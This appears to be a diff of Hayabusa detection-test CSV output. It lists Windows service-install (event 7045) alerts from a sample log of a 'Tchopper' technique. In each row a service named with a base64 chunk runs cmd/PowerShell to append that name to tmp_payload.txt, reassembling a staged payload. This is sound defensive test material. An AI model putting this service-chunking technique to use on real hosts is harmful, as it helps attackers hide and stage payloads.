+2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:53.026 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: biBMb2cgU2l6ZSAoTUIpIiA9ICRib3guVmFsdWUuQXBwbGljYXRpb25FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiU2VjdXJpdHkgKEVQUykiID0gJGJveC5WYWx1ZS5TZWN1cml0eUVQUzsgIl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:54.457 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NlY3VyaXR5IDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlNlY3VyaXR5Rmlyc3RFdmVudFRpbWU7ICJTZWN1cml0eSBsYXN0IEV2ZW50IiA9ICRib3guVmFsdWUuU2VjdXJpdHlMYXN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:55.903 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU2VjdXJpdHkgdG90YWwgZXZlbnRzIiA9ICRib3guVmFsdWUuU2VjdXJpdHlUb3RhbEV2ZW50czsgIlNlY3VyaXR5IExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TZWN1cml0eUV2ZW50TG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:57.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9nU2l6ZTsgDQogICAgICAgICAgICAiU3lzdGVtIChFUFMpIiA9ICRib3guVmFsdWUuU3lzdGVtRVBTOyAiU3lzdGVtIDFzdCBFdmVudCIgPSAkYm94LlZhbHVlLlN5c3RlbUZpcnN0RXZlbnRUaW1l | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:58.798 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: OyAiU3lzdGVtIGxhc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5TeXN0ZW1MYXN0RXZlbnRUaW1lOyAiU3lzdGVtIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLlN5c3RlbVRvdGFsRXZlbnRzOyAiU3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:19:00.236 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lzdGVtIExvZyBTaXplIChNQikiID0gJGJveC5WYWx1ZS5TeXN0ZW1FdmVudExvZ1NpemU7DQogICAgICAgICAgICAiVG90YWwgKEVQUykiID0gJGJveC5WYWx1ZS5Ub3RhbEVQUzsgIlByb2ZpbGUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg156"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
